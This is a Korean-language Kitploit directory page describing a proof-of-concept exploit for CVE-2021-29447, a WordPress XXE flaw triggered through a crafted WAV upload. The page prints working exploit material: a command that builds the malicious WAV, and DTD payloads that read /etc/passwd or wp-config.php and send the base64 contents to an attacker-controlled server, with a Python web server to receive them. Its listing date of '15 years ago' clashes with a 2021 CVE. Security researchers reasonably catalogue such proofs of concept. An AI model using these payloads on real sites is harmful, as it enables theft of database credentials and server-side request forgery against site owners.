Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-29447 — CVE-2021-29447에 대한 개념 증명 익스플로잇으로, WordPress의 XXE 취약점을 이용해 조작된 WAV 파일을 통해 임의 파일 노출 및 SSRF를 가능하게 합니다. | Kitploit
도구/GitHubGitHub/assassinukg/cve-2021-29447
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubassassinukg/cve-2021-29447

CVE-2021-29447

CVE-2021-29447에 대한 개념 증명 익스플로잇으로, WordPress의 XXE 취약점을 이용해 조작된 WAV 파일을 통해 임의 파일 노출 및 SSRF를 가능하게 합니다.

저장소 보기
15년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-29447

영향

임의 파일 유출: 호스트 파일 시스템의 모든 파일 내용을 검색할 수 있습니다. 예를 들어 데이터베이스 자격 증명과 같은 민감한 데이터를 포함하는 wp-config.php 파일이 있습니다. 서버 측 요청 위조(SSRF): WordPress 설치를 대신하여 HTTP 요청을 보낼 수 있습니다. 환경에 따라 심각한 영향을 미칠 수 있습니다. 취약점 악용

이 취약점의 영향을 받는 WordPress 사이트는 wpscan 도구를 사용한 열거 과정에서 식별되었습니다.

image

악의적인 WAV 파일 생성하기

매우 쉽습니다. bash 콘솔에서 다음을 실행하세요.

nano poc.wav echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

공격자 PC에서 웹 서버에서 실행할 코드로 dtd 파일을 생성하세요.

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

참고: WordPress 파일을 읽으려면 "../WP-FILE.php" 구문을 사용하세요.

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

파일 디렉터리에 Python 서버를 호스팅하세요 (python3 -m http.server 8081)

참고 자료

https://github.com/motikan2010/CVE-2021-29447 https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5

도구 다운로드